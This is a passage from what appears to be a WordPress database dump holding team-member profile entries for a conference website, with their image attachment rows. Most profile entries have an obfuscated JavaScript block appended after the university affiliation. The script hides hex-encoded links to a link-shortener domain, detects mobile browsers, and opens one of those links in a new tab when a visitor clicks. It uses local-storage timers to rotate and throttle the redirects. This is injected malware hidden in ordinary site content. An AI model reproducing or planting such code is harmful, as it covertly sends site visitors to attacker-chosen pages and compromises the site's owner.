Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Ayman Habib','','publish','closed','closed','','ayman-habib','','','2023-02-09 07:04:13','2023-02-09 07:04:13','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2537',0,'dt_team','',0),
(2538,1,'2022-10-07 19:05:13','2022-10-07 19:05:13','','2','','inherit','open','closed','','2-5','','','2022-10-07 19:05:13','2022-10-07 19:05:13','',2537,'https://gsw2023.com/wp-content/uploads/2022/10/2-4.jpg',0,'attachment','image/jpeg',0),
(2539,1,'2022-10-07 19:06:29','2022-10-07 19:06:29','<!-- wp:paragraph -->\n<p>University of Calgary, Canada (WG I/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Naser El-Sheimy','','publish','closed','closed','','naser-el-sheimy','','','2022-10-09 05:44:02','2022-10-09 05:44:02','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2539',0,'dt_team','',0),
(2540,1,'2022-10-07 19:06:20','2022-10-07 19:06:20','','2','','inherit','open','closed','','2-6','','','2022-10-07 19:06:20','2022-10-07 19:06:20','',2539,'https://gsw2023.com/wp-content/uploads/2022/10/2-5.jpg',0,'attachment','image/jpeg',0),
(2541,1,'2022-10-07 19:07:05','2022-10-07 19:07:05','<!-- wp:paragraph -->\n<p>University of Waterloo, Canada (WG I/4)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Jonathan Li','','publish','closed','closed','','jonathan-li-university-of-waterloo-canada-wg-i-4','','','2022-10-15 21:09:28','2022-10-15 21:09:28','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2541',0,'dt_team','',0),
(2542,1,'2022-10-07 19:06:56','2022-10-07 19:06:56','','1','','inherit','open','closed','','1-7','','','2022-10-07 19:06:56','2022-10-07 19:06:56','',2541,'https://gsw2023.com/wp-content/uploads/2022/10/1-6.jpg',0,'attachment','image/jpeg',0),
(2543,1,'2022-10-07 19:07:35','2022-10-07 19:07:35','<!-- wp:paragraph -->\n<p>&nbsp; Sun Yat-sen University, China (WG I/4)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs